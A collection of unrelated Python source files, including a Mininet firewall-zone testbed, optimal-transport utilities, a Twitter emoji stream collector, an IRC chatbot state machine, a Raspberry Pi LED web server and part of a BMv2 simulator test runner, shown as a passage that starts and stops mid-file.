success = success and not(test.test_tcp(src=host_dict['h11'], dest=host_dict['h13'], srcPort=80)) # Fail because we drop
#"PolicyID": 7, "Src": 2, "Dest": 1, "SrcPort": 0, "DestPort": 100, "Proto": "UDP", "Action": "established"
success = success and test.test_udp(src=host_dict['h13'], dest=host_dict['h12'], srcPort=123, destPort=100)
success = success and test.test_udp(src=host_dict['h12'], dest=host_dict['h13'], srcPort=100, destPort=123)
#"PolicyID": 8, "Src": 1, "Dest": 3, "SrcPort": 0, "DestPort": 0, "Proto": "", "Action": "established"
success = success and test.test_icmp(src=host_dict['h11'], dest=host_dict['h22'])
success = success and test.test_icmp(src=host_dict['h22'], dest=host_dict['h11'])
if success:
print("*** Inter Zone Test passed")
else:
print("*** Inter Zone Test failed")
test.prefix = ""
def test(self):
'''
just test only one thing
'''
test.prefix = "[Test] "
host_dict = self.get_host_dict()
#"PolicyID": 5, "Src": 1, "Dest": 2, "SrcPort": 80, "DestPort": 100, "Proto": "TCP", "Action": "established"
success = test.test_tcp(src=host_dict['h11'], dest=host_dict['h13'], srcPort=80, destPort=100) #OK
success = test.test_tcp(src=host_dict['h13'], dest=host_dict['h11'], srcPort=100, destPort=80) #OK
test.prefix = ""
def traffic_generator(self):
'''
generate some traffic for the packet-in benchmarking
'''
test.prefix = "[ICMP Traffic Generator] "
host_dict = self.get_host_dict()
while True:
t = time.time()
for i in range(9):
# 90% intra-zone
_ = self.net.ping([host_dict['h11'], host_dict['h12'], host_dict['h21']])
time.sleep(1)
for i in range(1):
# 10% mix
_ = self.net.ping([host_dict['h11'], host_dict['h12'], host_dict['h13'], host_dict['h21'], host_dict['h22']])
print("*** Time for this round was: "+str(time.time()-t)+"s")
def traffic_generator_intra_zone(self):
'''
generate intra zone traffic for benchmarking packet-in messages
'''
test.prefix = "[ICMP Traffic Generator] "
host_dict = self.get_host_dict()
while True:
t = time.time()
_ = self.net.ping([host_dict['h11'], host_dict['h12'], host_dict['h21']])
time.sleep(2)
def traffic_generator_inter_zone(self):
'''
generate inter zone traffic for benchmarking packet-in messages
'''
test.prefix = "[ICMP Traffic Generator] "
host_dict = self.get_host_dict()
while True:
t = time.time()
_ = self.net.ping([host_dict['h11'], host_dict['h12'], host_dict['h13'], host_dict['h21'], host_dict['h22']])
time.sleep(1)
def get_host_dict(self):
host_dict = {}
for host in self.hosts:
host_dict[host[0].name] = host[0]
return host_dict
def startCLI(self):
print ("*** Running CLI")
CLI( self.net )
def stopNet(self):
print ("*** Stopping network")
self.net.stop()
service.kill_processes()
if __name__ == '__main__':
setLogLevel( 'info' )
topo = EndpointTPTestbed()
topo.topology()
#Make sure that everything is ready
time.sleep(3)
try:
#topo.test_intra_zone()
#topo.test_inter_zone()
#topo.test()
#t1 = threading.Thread(target=topo.traffic_generator_inter_zone)
#t1.daemon = True
#
#t2 = threading.Thread(target=topo.traffic_generator_intra_zone)
#t2.daemon = True
#t1.start()
#t2.start()
#while True:
# pass
topo.traffic_generator_intra_zone()
topo.startCLI()
finally:
topo.stopNet()
|
testcase.py
|
import numpy as np
import subprocess as sp
from threading import Thread
n_samples = 44100
proc = sp.Popen(['cat'], stdin=sp.PIPE, stdout=sp.PIPE)
out_arr = np.ones(n_samples, dtype=np.int16)
def reader():
in_arr = np.fromfile(proc.stdout, np.int16, n_samples)
assert np.all(np.equal(in_arr, out_arr))
reader_thread = Thread(target=reader)
reader_thread.start()
out_arr.tofile(proc.stdin)
|
utils.py
|
# -*- coding: utf-8 -*-
"""
Various functions that can be useful
"""
# Author: Remi Flamary <remi.flamary@unice.fr>
#
# License: MIT License
import multiprocessing
from functools import reduce
import time
import numpy as np
from scipy.spatial.distance import cdist
import sys
import warnings
__time_tic_toc = time.time()
def tic():
""" Python implementation of Matlab tic() function """
global __time_tic_toc
__time_tic_toc = time.time()
def toc(message='Elapsed time : {} s'):
""" Python implementation of Matlab toc() function """
t = time.time()
print(message.format(t - __time_tic_toc))
return t - __time_tic_toc
def toq():
""" Python implementation of Julia toc() function """
t = time.time()
return t - __time_tic_toc
def kernel(x1, x2, method='gaussian', sigma=1, **kwargs):
"""Compute kernel matrix"""
if method.lower() in ['gaussian', 'gauss', 'rbf']:
K = np.exp(-dist(x1, x2) / (2 * sigma**2))
return K
def unif(n):
""" return a uniform histogram of length n (simplex)
Parameters
----------
n : int
number of bins in the histogram
Returns
-------
h : np.array (n,)
histogram of length n such that h_i=1/n for all i
"""
return np.ones((n,)) / n
def clean_zeros(a, b, M):
""" Remove all components with zeros weights in a and b
"""
    M2 = M[a > 0, :][:, b > 0].copy()  # copy forces a C-style matrix (for emd)
a2 = a[a > 0]
b2 = b[b > 0]
return a2, b2, M2
def dist(x1, x2=None, metric='sqeuclidean'):
"""Compute distance between samples in x1 and x2 using function scipy.spatial.distance.cdist
Parameters
----------
x1 : np.array (n1,d)
matrix with n1 samples of size d
x2 : np.array (n2,d), optional
matrix with n2 samples of size d (if None then x2=x1)
metric : str, fun, optional
name of the metric to be computed (full list in the doc of scipy), If a string,
the distance function can be 'braycurtis', 'canberra', 'chebyshev', 'cityblock',
'correlation', 'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'kulsinski',
'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean',
'sokalmichener', 'sokalsneath', 'sqeuclidean', 'wminkowski', 'yule'.
Returns
-------
M : np.array (n1,n2)
distance matrix computed with given metric
"""
if x2 is None:
x2 = x1
return cdist(x1, x2, metric=metric)
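# Minimal usage sketch for dist() and unif() (shapes and values chosen arbitrarily):
#
#   xs = np.random.randn(5, 2)
#   xt = np.random.randn(7, 2)
#   M = dist(xs, xt)           # (5, 7) squared-Euclidean cost matrix
#   a, b = unif(5), unif(7)    # uniform weights for the two sample sets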
def dist0(n, method='lin_square'):
"""Compute standard cost matrices of size (n,n) for OT problems
Parameters
----------
n : int
size of the cost matrix
method : str, optional
Type of loss matrix chosen from:
* 'lin_square' : linear sampling between 0 and n-1, quadratic loss
Returns
-------
M : np.array (n1,n2)
distance matrix computed with given metric
"""
res = 0
if method == 'lin_square':
x = np.arange(n, dtype=np.float64).reshape((n, 1))
res = dist(x, x)
return res
def cost_normalization(C, norm=None):
""" Apply normalization to the loss matrix
Parameters
----------
C : np.array (n1, n2)
The cost matrix to normalize.
norm : str
        type of normalization from 'median', 'max', 'log', 'loglog'. Any other
        value leaves the matrix unnormalized.
Returns
-------
C : np.array (n1, n2)
The input cost matrix normalized according to given norm.
"""
if norm == "median":
C /= float(np.median(C))
elif norm == "max":
C /= float(np.max(C))
elif norm == "log":
C = np.log(1 + C)
elif norm == "loglog":
C = np.log(1 + np.log(1 + C))
return C
def dots(*args):
""" dots function for multiple matrix multiply """
return reduce(np.dot, args)
def fun(f, q_in, q_out):
""" Utility function for parmap with no serializing problems """
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
def parmap(f, X, nprocs=multiprocessing.cpu_count()):
""" paralell map for multiprocessing """
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [multiprocessing.Process(target=fun, args=(f, q_in, q_out))
for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
return [x for i, x in sorted(res)]
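# Usage sketch for parmap() (illustrative only); results come back in input order:
#
#   def _square(v):
#       return v * v
#
#   squares = parmap(_square, range(8), nprocs=4)  # -> [0, 1, 4, 9, 16, 25, 36, 49]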
def check_params(**kwargs):
"""check_params: check whether some parameters are missing
"""
missing_params = []
check = True
for param in kwargs:
if kwargs[param] is None:
missing_params.append(param)
if len(missing_params) > 0:
print("POT - Warning: following necessary parameters are missing")
for p in missing_params:
print("\n", p)
check = False
return check
class deprecated(object):
"""Decorator to mark a function or class as deprecated.
deprecated class from scikit-learn package
https://github.com/scikit-learn/scikit-learn/blob/master/sklearn/utils/deprecation.py
Issue a warning when the function is called/the class is instantiated and
adds a warning to the docstring.
The optional extra argument will be appended to the deprecation message
    and the docstring. Note: to use this with the default value for extra, put
    in an empty set of parentheses:
>>> from ot.deprecation import deprecated
>>> @deprecated()
... def some_function(): pass
Parameters
----------
extra : string
to be added to the deprecation messages
"""
# Adapted from http://wiki.python.org/moin/PythonDecoratorLibrary,
# but with many changes.
def __init__(self, extra=''):
self.extra = extra
def __call__(self, obj):
"""Call method
Parameters
----------
obj : object
"""
if isinstance(obj, type):
return self._decorate_class(obj)
else:
return self._decorate_fun(obj)
def _decorate_class(self, cls):
msg = "Class %s is deprecated" % cls.__name__
if self.extra:
msg += "; %s" % self.extra
# FIXME: we should probably reset __new__ for full generality
init = cls.__init__
def wrapped(*args, **kwargs):
warnings.warn(msg, category=DeprecationWarning)
return init(*args, **kwargs)
cls.__init__ = wrapped
wrapped.__name__ = '__init__'
wrapped.__doc__ = self._update_doc(init.__doc__)
wrapped.deprecated_original = init
return cls
def _decorate_fun(self, fun):
"""Decorate function fun"""
msg = "Function %s is deprecated" % fun.__name__
if self.extra:
msg += "; %s" % self.extra
def wrapped(*args, **kwargs):
warnings.warn(msg, category=DeprecationWarning)
return fun(*args, **kwargs)
wrapped.__name__ = fun.__name__
wrapped.__dict__ = fun.__dict__
wrapped.__doc__ = self._update_doc(fun.__doc__)
return wrapped
def _update_doc(self, olddoc):
newdoc = "DEPRECATED"
if self.extra:
newdoc = "%s: %s" % (newdoc, self.extra)
if olddoc:
newdoc = "%s\n\n%s" % (newdoc, olddoc)
return newdoc
def _is_deprecated(func):
"""Helper to check if func is wraped by our deprecated decorator"""
if sys.version_info < (3, 5):
raise NotImplementedError("This is only available for python3.5 "
"or above")
closures = getattr(func, '__closure__', [])
if closures is None:
closures = []
is_deprecated = ('deprecated' in ''.join([c.cell_contents
for c in closures
if isinstance(c.cell_contents, str)]))
return is_deprecated
class BaseEstimator(object):
"""Base class for most objects in POT
adapted from sklearn BaseEstimator class
Notes
-----
All estimators should specify all the parameters that can be set
at the class level in their ``__init__`` as explicit keyword
arguments (no ``*args`` or ``**kwargs``).
"""
@classmethod
def _get_param_names(cls):
"""Get parameter names for the estimator"""
try:
from inspect import signature
except ImportError:
from .externals.funcsigs import signature
# fetch the constructor or the original constructor before
# deprecation wrapping if any
init = getattr(cls.__init__, 'deprecated_original', cls.__init__)
if init is object.__init__:
# No explicit constructor to introspect
return []
# introspect the constructor arguments to find the model parameters
# to represent
init_signature = signature(init)
# Consider the constructor parameters excluding 'self'
parameters = [p for p in init_signature.parameters.values()
if p.name != 'self' and p.kind != p.VAR_KEYWORD]
for p in parameters:
if p.kind == p.VAR_POSITIONAL:
raise RuntimeError("POT estimators should always "
"specify their parameters in the signature"
" of their __init__ (no varargs)."
" %s with constructor %s doesn't "
" follow this convention."
% (cls, init_signature))
# Extract and sort argument names excluding 'self'
return sorted([p.name for p in parameters])
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
out = dict()
for key in self._get_param_names():
# We need deprecation warnings to always be on in order to
# catch deprecated param values.
# This is set in utils/__init__.py but it gets overwritten
# when running under python3 somehow.
warnings.simplefilter("always", DeprecationWarning)
try:
with warnings.catch_warnings(record=True) as w:
value = getattr(self, key, None)
if len(w) and w[0].category == DeprecationWarning:
# if the parameter is deprecated, don't show it
continue
finally:
warnings.filters.pop(0)
# XXX: should we rather test if instance of estimator?
if deep and hasattr(value, 'get_params'):
deep_items = value.get_params().items()
out.update((key + '__' + k, val) for k, val in deep_items)
out[key] = value
return out
def set_params(self, **params):
"""Set the parameters of this estimator.
The method works on simple estimators as well as on nested objects
(such as pipelines). The latter have parameters of the form
``<component>__<parameter>`` so that it's possible to update each
component of a nested object.
Returns
-------
self
"""
if not params:
# Simple optimisation to gain speed (inspect is slow)
return self
valid_params = self.get_params(deep=True)
# for key, value in iteritems(params):
for key, value in params.items():
split = key.split('__', 1)
if len(split) > 1:
# nested objects case
name, sub_name = split
if name not in valid_params:
raise ValueError('Invalid parameter %s for estimator %s. '
'Check the list of available parameters '
'with `estimator.get_params().keys()`.' %
(name, self))
sub_object = valid_params[name]
sub_object.set_params(**{sub_name: value})
else:
# simple objects case
if key not in valid_params:
raise ValueError('Invalid parameter %s for estimator %s. '
'Check the list of available parameters '
'with `estimator.get_params().keys()`.' %
(key, self.__class__.__name__))
setattr(self, key, value)
return self
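# Illustrative sketch (not from the original file): a tiny estimator built on
# BaseEstimator to show how get_params/set_params interact with __init__ keyword
# arguments. The class name and its parameters are invented for the example.
#
#   class ToyEstimator(BaseEstimator):
#       def __init__(self, reg=1.0, metric='sqeuclidean'):
#           self.reg = reg
#           self.metric = metric
#
#   est = ToyEstimator()
#   est.get_params()            # {'metric': 'sqeuclidean', 'reg': 1.0}
#   est.set_params(reg=0.1)     # returns est, now with est.reg == 0.1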
|
tweet_stream.py
|
#!/usr/bin/env python3
# this is based on http://adilmoujahid.com/posts/2014/07/twitter-analytics/
import collections
import json
import html
import os
import re
import sys
import queue
import threading
import tweepy
import tweepy.api
import tweepy.streaming
conf = json.load(open(os.environ['TWITTER_CONFIG']))
access_token = conf['access']
access_token_secret = conf['access_secret']
consumer_key = conf['consumer']
consumer_secret = conf['consumer_secret']
def get_text(d):
if d.get('extended_tweet'):
d = d['extended_tweet']
t = d['full_text']
else:
t = d.get('text')
assert not t or not d['truncated']
if not t:
return
for m in d.get('entities', {}).get('media', []):
if m.get('url'):
t = t.replace(m['url'], m['expanded_url'])
for m in d.get('entities', {}).get('urls', []):
t = t.replace(m['url'], m['expanded_url'])
return t.replace('\n', '\t')
class Listener(tweepy.streaming.StreamListener):
def __init__(self, ems, rare_thresh=100):
self.f = open('tweets', 'a')
self.frol = open('/dev/shm/tweets_recent', 'a')
self.set_rare_regex(ems[rare_thresh:])
self.queue = queue.Queue(maxsize=1000000)
threading.Thread(target=self.run, daemon=True).start()
def set_rare_regex(self, ems):
self.rare_ems_re = re.compile(r'(%s)' % '|'.join(e for e in ems))
def run(self):
seen_ids = collections.OrderedDict()
n = 0
while True:
try:
data = self.queue.get(block=True)
            except:
                import traceback
                traceback.print_exc()
                continue  # don't fall through with `data` possibly unbound
if data is None:
break
try:
d = json.loads(html.unescape(data))
except json.JSONDecodeError:
open('tweets_corrupt', 'a').write(data)
d = json.loads(data)
t = get_text(d)
if not t:
print(d)
continue
if self.frol.tell() > 10e6:
self.frol.seek(0)
self.frol.truncate()
self.frol.write(data)
if d['id'] in seen_ids:
continue
if d.get('retweeted') or t.startswith('RT @'):
continue
seen_ids[d['id']] = True
if len(seen_ids) > 10000:
seen_ids.popitem(last=False)
e = [d['id'], d['timestamp_ms'], d['user']['screen_name'], t]
if self.rare_ems_re.search(t):
print('%8d' % n, *e)
print(*e, file=self.f)
n += 1
def on_data(self, data):
self.queue.put(data)
return True
def on_error(self, status):
print(status)
return False
if __name__ == '__main__':
rank = json.load(open('data/emojitracker_rankings.json'))
ems = [x['char'] for x in rank]
ems_counts = {e: 0 for e in ems}
l = Listener(ems, 200)
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
if sys.argv[-1] == 'search':
vec_have = {l.split()[0] for l in open('data/tweets_vec_emoji.txt')}
missed = [e for e in ems if e not in vec_have]
api = tweepy.API(auth)
for x in range(len(missed)):
for tw in tweepy.Cursor(api.search,
q=' OR '.join(missed[x:x + 1]) +
' -filter:replies -filter:nativeretweets',
count=100,
until='2019-06-01',
lang='en',
tweet_mode='extended').items(1500):
t = get_text(tw._json)
if not t:
continue
if not any(m in t for m in missed):
continue
e = [
tw.id,
int(tw.created_at.timestamp() * 1000), tw.user.screen_name,
t
]
print(*e)
print(*e, file=l.f)
l.f.flush()
sys.exit(0)
#a = slice(None, 20)
#a = slice(40, 70)
a = slice(40, 440)
# a = slice(50, 150) # try to collect some rarer stuff
b = slice(a.stop, a.stop + 400)
if sys.argv[-1] == 'freq':
for line in open('tweets.vocab'):
w, c = line.split(' ')
if w in ems_counts:
ems_counts[w] = int(c)
ems.sort(key=ems_counts.get)
print('monitoring', ' '.join(ems[:800]))
a = slice(0, 780, 2)
b = slice(1, 780, 2)
print(sorted(ems_counts.items(), key=lambda x: x[1])[:780])
l.set_rare_regex(ems[:400])
stream = tweepy.Stream(auth, l, tweet_mode='extended')
stream2 = tweepy.Stream(auth, l, tweet_mode='extended')
stream.filter(track=ems[a], languages=['en'], is_async=True)
stream2.filter(track=ems[b], languages=['en'], is_async=True)
|
assignment.py
|
from threading import *
class EvenNumbers:
def even(self):
self.c = Condition()
self.c.acquire()
for i in range(1,101):
if i%2==0:
print(i)
self.c.notify()
self.c.release()
class OddNumbers:
def odd(self):
self.c = Condition()
self.c.acquire()
for i in range(1,101):
if i%2==1:
print(i)
self.c.notify()
self.c.release()
e = EvenNumbers()
o = OddNumbers()
t1 = Thread(target = e.even)
t2 = Thread(target = o.odd)
t1.start()
t2.start()
'''
Someone else's Program:
from threading import *
class MyThread:
def displayEvenNumbers(self):
i = 0
while(i<=100 and i%2==0):
print(i)
i+=1
def displayOddNumbers(self):
l = 0
while(l<=100 and l%2!=0):
print(l)
l+=1
k = 0
while(k<=100):
print(k)
k+=1
obj = MyThread()
t1 = Thread(target=obj.displayEvenNumbers)
t1.start()
t2 = Thread(target=obj.displayOddNumbers)
t2.start()
'''
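# Note (added commentary, not part of the assignment): each class above builds its
# own Condition, so notify()/release() never synchronise the two threads; both
# loops simply run independently. A minimal sketch of real alternation with one
# shared Condition could look like the following (helper names invented for
# illustration):
#
#   from threading import Condition, Thread
#   cond = Condition()
#   turn = ['odd']                      # odd numbers go first: 1, 2, 3, ...
#
#   def printer(parity, start):
#       for i in range(start, 101, 2):
#           with cond:
#               while turn[0] != parity:
#                   cond.wait()
#               print(i)
#               turn[0] = 'even' if parity == 'odd' else 'odd'
#               cond.notify()
#
#   Thread(target=printer, args=('odd', 1)).start()
#   Thread(target=printer, args=('even', 2)).start()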
|
conversation.py
|
from queue import Queue, Empty
from threading import Thread
from time import sleep
from random import uniform
from personalities.sheldon import Sheldon
from personalities.generic import Generic
class ConversationStateMachine:
def __init__(self, partner_name, reply_sink, finish_hook=None, default_persona="generic"):
"""
        Creates a conversation state machine that produces replies for a single conversation partner.
        :param partner_name: Name of the person we're conversing with
        :param reply_sink: Function to call with outgoing messages (irc privmsg probably)
        :param finish_hook: Optional callable invoked with the partner's name once the conversation is over
        :param default_persona: Either "generic" or "sheldon"; selects which persona is active initially
"""
self.sheldon = Sheldon(self.reply)
self.generic = Generic(self.reply)
self.active = self.generic if default_persona == "generic" else self.sheldon
self.conversation_partner = partner_name
self.message_queue = Queue()
self.thread = Thread(target=self.loop)
self.reply_sink = reply_sink
self.finish_hook = finish_hook
self.stopmsg = False
def stop(self):
self.stopmsg = True
def start(self, initial_message=None):
"""
        Call this to start the conversation state machine
"""
if not initial_message:
self.active.initiate()
else:
self.message_queue.put(initial_message)
self.thread.start()
def incoming_message(self, message):
"""
Insert a message into the queue that should be processed by this greeting state machine.
:param message: The message to be processed
"""
self.message_queue.put(message)
def reply(self, message):
"""
Sends a reply to the person this greeting state machine is conversing with using the reply sink.
:param message: Message to be sent as a reply
"""
outgoing_message = "{}: {}".format(self.conversation_partner, message)
if not self.stopmsg:
self.reply_sink(outgoing_message)
def loop(self):
        while not self.stopmsg:
incoming_message = None
try:
incoming_message = self.message_queue.get(timeout=30)
sleep(uniform(1, 3))
except Empty:
incoming_message = None
self.active.handle_timeout()
if self.active.delegate(incoming_message):
if self.active is self.generic:
self.active = self.sheldon
else:
                    self.active = self.generic
if self.active.handle_message(incoming_message):
break
if self.finish_hook:
self.finish_hook(self.conversation_partner)
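# Usage sketch (added for illustration, not part of the original module). The
# `personalities` package is project-specific, so this only shows how the state
# machine is driven from the outside; `print` stands in for an IRC privmsg sink:
#
#   csm = ConversationStateMachine("alice", reply_sink=print,
#                                  finish_hook=lambda who: print("done with", who))
#   csm.start()                         # or csm.start("hi there") to react to an opener
#   csm.incoming_message("how are you?")
#   csm.stop()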
|
main.py
|
#!/usr/bin/python
from bottle import get, request, route, run, static_file, template
import time, threading
from neopixel import *
# LED strip configuration:
LED_COUNT = 32 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 5 # DMA channel to use for generating signal (try 5)
LED_BRIGHTNESS = 20 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
# Create NeoPixel object with appropriate configuration.
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS)
# Intialize the library (must be called once before other functions).
strip.begin()
strip.show()
BRIGHTNESS_MAX = 100
rgb = 0
light_type = 'off'
@get("/")
def index():
global rgb, light_type
rgb = 0xffffff
light_type = 'off'
return static_file('index.html', './')
# Serve the static files referenced by the web page
@route('/<filename>')
def server_static(filename):
return static_file(filename, root='./')
# Receive the RGB value sent via Ajax POST
@route('/rgb', method='POST')
def rgbLight():
red = request.POST.get('red')
green = request.POST.get('green')
blue = request.POST.get('blue')
#print('red='+ red +', green='+ green +', blue='+ blue)
red = int(red)
green = int(green)
blue = int(blue)
if 0 <= red <= 255 and 0 <= green <= 255 and 0 <= blue <= 255:
global rgb
rgb = (red<<8) | (green<<16) | blue
@route('/lightType', method='POST')
def lightType():
global light_type
light_type = request.POST.get('type')
print("lightType="+light_type)
@route('/brightness', method='POST')
def brightness():
    value = request.POST.get('brightness')  # keep it local; don't rebind this handler's name
    print("brightness=" + value)
    value = int(value)
    if 0 <= value <= BRIGHTNESS_MAX:
        strip.setBrightness(value)
def lightLoop():
global rgb, light_type
flashTime = [0.3, 0.2, 0.1, 0.05, 0.05, 0.1, 0.2, 0.5, 0.2]
flashTimeIndex = 0
f = lambda x: (-1/10000.0)*x*x + (1/50.0)*x
x = 0
while True:
if light_type == 'off':
for i in range(0,strip.numPixels()):
strip.setPixelColor(i, 0)
strip.show()
time.sleep(0.05)
elif light_type == 'static':
for i in range(0,strip.numPixels()):
strip.setPixelColor(i, rgb)
strip.show()
time.sleep(0.05)
elif light_type == 'breath':
red = int(((rgb & 0x00ff00)>>8) * f(x))
green = int(((rgb & 0xff0000) >> 16) * f(x))
blue = int((rgb & 0x0000ff) * f(x))
_rgb = int((red << 8) | (green << 16) | blue)
for i in range(0,strip.numPixels()):
strip.setPixelColor(i, _rgb)
strip.show()
time.sleep(0.02)
x += 1
if x >= 200:
x = 0
        elif light_type == 'flash':  # flashing display
for i in range(0,strip.numPixels()):
strip.setPixelColor(i, rgb)
strip.show()
time.sleep(flashTime[flashTimeIndex])
for i in range(0,strip.numPixels()):
strip.setPixelColor(i, 0)
strip.show()
time.sleep(flashTime[flashTimeIndex])
flashTimeIndex += 1
if flashTimeIndex >= len(flashTime):
flashTimeIndex = 0
t = threading.Thread(target = lightLoop)
t.setDaemon(True)
t.start()
run(host="0.0.0.0", port=80)
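# Example requests against the three POST routes above (added for illustration;
# replace <pi-address> with the device's IP; the form-field names come from the
# handlers in this file):
#
#   curl -d 'red=255' -d 'green=64' -d 'blue=0' http://<pi-address>/rgb
#   curl -d 'type=breath'                       http://<pi-address>/lightType
#   curl -d 'brightness=50'                     http://<pi-address>/brightness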
|
bmv2stf.py
|
#!/usr/bin/env python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Runs the BMv2 behavioral model simulator with input from an stf file
from __future__ import print_function
from subprocess import Popen
from threading import Thread
from glob import glob
import json
import sys
import re
import os
import stat
import tempfile
import shutil
import difflib
import subprocess
import signal
import time
import random
import errno
import socket
from string import maketrans
from collections import OrderedDict
try:
from scapy.layers.all import *
from scapy.utils import *
except ImportError:
pass
SUCCESS = 0
FAILURE = 1
class TimeoutException(Exception): pass
def signal_handler(signum, frame):
    raise TimeoutException("Timed out!")
signal.signal(signal.SIGALRM, signal_handler)
class Options(object):
def __init__(self):
self.binary = None
self.verbose = False
self.preserveTmp = False
self.observationLog = None
self.usePsa = False
def nextWord(text, sep = None):
# Split a text at the indicated separator.
# Note that the separator can be a string.
# Separator is discarded.
spl = text.split(sep, 1)
if len(spl) == 0:
return '', ''
elif len(spl) == 1:
return spl[0].strip(), ''
else:
return spl[0].strip(), spl[1].strip()
def ByteToHex(byteStr):
return ''.join( [ "%02X " % ord( x ) for x in byteStr ] ).strip()
def HexToByte(hexStr):
bytes = []
hexStr = ''.join( hexStr.split(" ") )
for i in range(0, len(hexStr), 2):
bytes.append( chr( int (hexStr[i:i+2], 16 ) ) )
return ''.join( bytes )
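# Quick round-trip illustration of the two helpers above (comment added for
# clarity, not part of the original script); both operate on Python 2 byte strings:
#
#   ByteToHex('\x01\xab')              -> '01 AB'
#   HexToByte('01 AB')                 -> '\x01\xab'
#   HexToByte(ByteToHex(pkt)) == pkt   for any byte string pkt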
def reportError(*message):
print("***", *message)
class Local(object):
    # object to hold local vars accessible to nested functions
pass
def FindExe(dirname, exe):
dir = os.getcwd()
while len(dir) > 1:
if os.path.isdir(os.path.join(dir, dirname)):
rv = None
rv_time = 0
for dName, sdName, fList in os.walk(os.path.join(dir, dirname)):
if exe in fList:
n=os.path.join(dName, exe)
if os.path.isfile(n) and os.access(n, os.X_OK):
n_time = os.path.getmtime(n)
if n_time > rv_time:
rv = n
rv_time = n_time
if rv is not None:
return rv
dir = os.path.dirname(dir)
return exe
def run_timeout(verbose, args, timeout, stderr):
if verbose:
print("Executing ", " ".join(args))
local = Local()
local.process = None
def target():
procstderr = None
if stderr is not None:
procstderr = open(stderr, "w")
local.process = Popen(args, stderr=procstderr)
local.process.wait()
thread = Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print("Timeout ", " ".join(args), file=sys.stderr)
local.process.terminate()
thread.join()
if local.process is None:
# never even started
reportError("Process failed to start")
return -1
if verbose:
print("Exit code ", local.process.returncode)
return local.process.returncode
timeout = 10 * 60
class ConcurrentInteger(object):
# Generates exclusive integers in a range 0-max
# in a way which is safe across multiple processes.
# It uses a simple form of locking using folder names.
# This is necessary because this script may be invoked
# concurrently many times by make, and we need the many simulator instances
# to use different port numbers.
def __init__(self, folder, max):
self.folder = folder
self.max = max
def lockName(self, value):
return "lock_" + str(value)
def release(self, value):
os.rmdir(self.lockName(value))
def generate(self):
# try 10 times
for i in range(0, 10):
index = random.randint(0, self.max)
file = self.lockName(index)
try:
os.makedirs(file)
return index
except:
time.sleep(1)
continue
return None
class BMV2ActionArg(object):
def __init__(self, name, width):
# assert isinstance(name, str)
# assert isinstance(width, int)
self.name = name
self.width = width
class TableKey(object):
def __init__(self):
self.fields = OrderedDict()
def append(self, name, type):
self.fields[name] = type
class TableKeyInstance(object):
def __init__(self, tableKey):
assert isinstance(tableKey, TableKey)
self.values = {}
self.key = tableKey
for f,t in tableKey.fields.iteritems():
if t == "ternary":
self.values[f] = "0&&&0"
elif t == "lpm":
self.values[f] = "0/0"
elif t == "exact":
self.values[f] = "0"
elif t == "valid":
self.values[f] = "0"
else:
raise Exception("Unexpected key type " + t)
def set(self, key, value):
array = re.compile("(.*)\$([0-9]+)(.*)");
m = array.match(key)
if m:
key = m.group(1) + "[" + m.group(2) + "]" + m.group(3)
found = False
if key in self.key.fields:
found = True
elif key + '$' in self.key.fields:
key = key + '$'
found = True
elif key + '.$valid$' in self.key.fields:
key = key + '.$valid$'
found = True
elif key.endswith(".valid"):
alt = key[:-5] + "$valid$"
if alt in self.key.fields:
key = alt
found = True
if not found:
for i in self.key.fields:
if i.endswith("." + key) or i.endswith("." + key + "$"):
key = i
found = True
elif key == "valid" and i.endswith(".$valid$"):
key = i
found = True
if not found and key == "valid" and "$valid$" in self.key.fields:
key = "$valid$"
found = True
if not found:
raise Exception("Unexpected key field " + key)
if self.key.fields[key] == "ternary":
self.values[key] = self.makeMask(value)
elif self.key.fields[key] == "lpm":
self.values[key] = self.makeLpm(value)
else:
self.values[key] = value
def makeMask(self, value):
# TODO -- we really need to know the size of the key to make the mask properly,
# but to find that, we need to parse the headers and header_types from the json
if value.startswith("0x"):
mask = "F"
value = value[2:]
prefix = "0x"
elif value.startswith("0b"):
mask = "1"
value = value[2:]
prefix = "0b"
elif value.startswith("0o"):
mask = "7"
value = value[2:]
prefix = "0o"
else:
raise Exception("Decimal value "+value+" not supported for ternary key")
values = "0123456789abcdefABCDEF*"
replacements = (mask * 22) + "0"
trans = maketrans(values, replacements)
m = value.translate(trans)
return prefix + value.replace("*", "0") + "&&&" + prefix + m
def makeLpm(self, value):
if value.find('/') >= 0:
return value
if value.startswith("0x"):
bits_per_digit = 4
elif value.startswith("0b"):
bits_per_digit = 1
elif value.startswith("0o"):
bits_per_digit = 3
else:
value = "0x" + hex(int(value))
bits_per_digit = 4
digits = len(value) - 2 - value.count('*')
return value.replace('*', '0') + "/" + str(digits*bits_per_digit)
def __str__(self):
result = ""
for f in self.key.fields:
if result != "":
result += " "
result += self.values[f]
return result
class BMV2ActionArguments(object):
def __init__(self, action):
assert isinstance(action, BMV2Action)
self.action = action
self.values = {}
def set(self, key, value):
found = False
for i in self.action.args:
if key == i.name:
found = True
if not found:
